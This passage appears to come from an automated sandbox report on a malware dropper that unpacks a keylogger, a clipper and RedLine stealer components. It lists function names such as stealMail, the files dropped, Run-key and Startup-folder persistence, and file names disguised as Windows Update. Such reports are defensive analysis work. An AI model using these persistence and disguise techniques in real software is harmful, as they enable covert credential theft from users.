                  Source: 17.2.Windows Update.exe.d40000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.2.Windows Update.exe.d40000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.0.Windows Update.exe.d40000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.0.Windows Update.exe.d40000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.0.Windows Update.exe.d40000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.0.Windows Update.exe.d40000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.0.Windows Update.exe.d40000.12.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.0.Windows Update.exe.d40000.12.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.0.Windows Update.exe.d40000.12.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.0.Windows Update.exe.d40000.12.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_007D0712 push eax; ret
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_007D0712 push eax; ret
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_007ABA9D push eax; ret
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_007ABA9D push eax; ret
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_00C63061 push eax; ret
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_00C63030 push ecx; ret
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_00C6303C push ecx; ret
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_00C62941 push edi; ret
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_00C6294D push edi; ret
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_00C62924 push edi; ret
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_00C62B5C push eax; ret
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_00C62CC5 push edi; ret
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_02770000 push edx; ret
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_027705CF push ebx; iretd
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeCode function: 8_2_00402448 push 0040112Eh; ret
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeCode function: 8_2_0040245C push 0040112Eh; ret
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeCode function: 8_2_00402470 push 0040112Eh; ret
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeCode function: 8_2_0040240C push 0040112Eh; ret
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeCode function: 8_2_00402420 push 0040112Eh; ret
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeCode function: 8_2_00402434 push 0040112Eh; ret
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeCode function: 8_2_00402484 push 0040112Eh; ret
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeCode function: 8_2_00402498 push 0040112Eh; ret
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeCode function: 8_2_004024AC push 0040112Eh; ret
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeCode function: 8_2_00402344 push 0040112Eh; ret
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeCode function: 8_2_00402358 push 0040112Eh; ret
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeCode function: 8_2_0040236C push 0040112Eh; ret
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeCode function: 8_2_00402308 push 0040112Eh; ret
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeCode function: 8_2_0040231C push 0040112Eh; ret
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeCode function: 8_2_00402330 push 0040112Eh; ret
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeCode function: 8_2_004023D0 push 0040112Eh; ret
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeCode function: 8_2_004023E4 push 0040112Eh; ret
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeCode function: 0_2_004011CF LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetEnvironmentVariableA,
                  Source: hhzclipper.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x9649
                  Source: WindowsUpdate.exe.17.drStatic PE information: real checksum: 0x0 should be: 0x88c7e
                  Source: Windows Update.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x88c7e
                  Source: Keylogger.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x88c7e
                  Source: RedLine.MainPanel-cracked.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1dd75
                  Source: 61bc7bd88d10e97264127fe545415b17.exe.16.drStatic PE information: real checksum: 0x0 should be: 0x1dd75
                  Source: ViRuS.exe.0.drStatic PE information: real checksum: 0x17efc should be: 0xbc9c
                  Source: RedLine.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1dd75
                  Source: user32dll.exe.8.drStatic PE information: real checksum: 0x17efc should be: 0xbc9c
                  Source: Hpdyv8oO3j.exeStatic PE information: real checksum: 0x0 should be: 0x1919e0

                  Persistence and Installation Behavior:

                  barindex
                  Uses cmd line tools excessively to alter registry or file dataShow sources
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess created: attrib.exe
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess created: attrib.exe
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess created: attrib.exe
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess created: attrib.exe
                  Drops executables to the windows directory (C:\Windows) and starts themShow sources
                  Source: unknownExecutable created and started: C:\Windows\SysWOW64\user32dll.exe
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeFile created: C:\Users\user\AppData\Roaming\RedLine.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeFile created: C:\Users\user\AppData\Local\Temp\ViRuS.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeFile created: C:\Windows\SysWOW64\user32dll.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeFile created: C:\Users\user\AppData\Roaming\Windows Update.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeFile created: C:\Users\user\AppData\Local\Temp\hhzclipper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeFile created: C:\Users\user\AppData\Local\Temp\Keylogger.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\61bc7bd88d10e97264127fe545415b17.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile created: C:\Users\user\AppData\Roaming\WindowsUpdate.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeFile created: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeFile created: C:\Windows\SysWOW64\user32dll.exeJump to dropped file

                  Boot Survival:

                  barindex
                  Creates multiple autostart registry keysShow sources
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Update
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 61bc7bd88d10e97264127fe545415b17
                  Drops PE files to the startup folderShow sources
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\61bc7bd88d10e97264127fe545415b17.exeJump to dropped file
                  Creates autostart registry keys with suspicious namesShow sources
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 61bc7bd88d10e97264127fe545415b17
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnkJump to behavior
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\61bc7bd88d10e97264127fe545415b17.exe
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnkJump to behavior
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 61bc7bd88d10e97264127fe545415b17
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 61bc7bd88d10e97264127fe545415b17
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 61bc7bd88d10e97264127fe545415b17
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 61bc7bd88d10e97264127fe545415b17
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Update
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Update

                  Hooking and other Techniques for Hiding and Protection:

                  barindex
                  Changes the view of files in windows explorer (hidden files and folders)Show sources
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_00441975 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
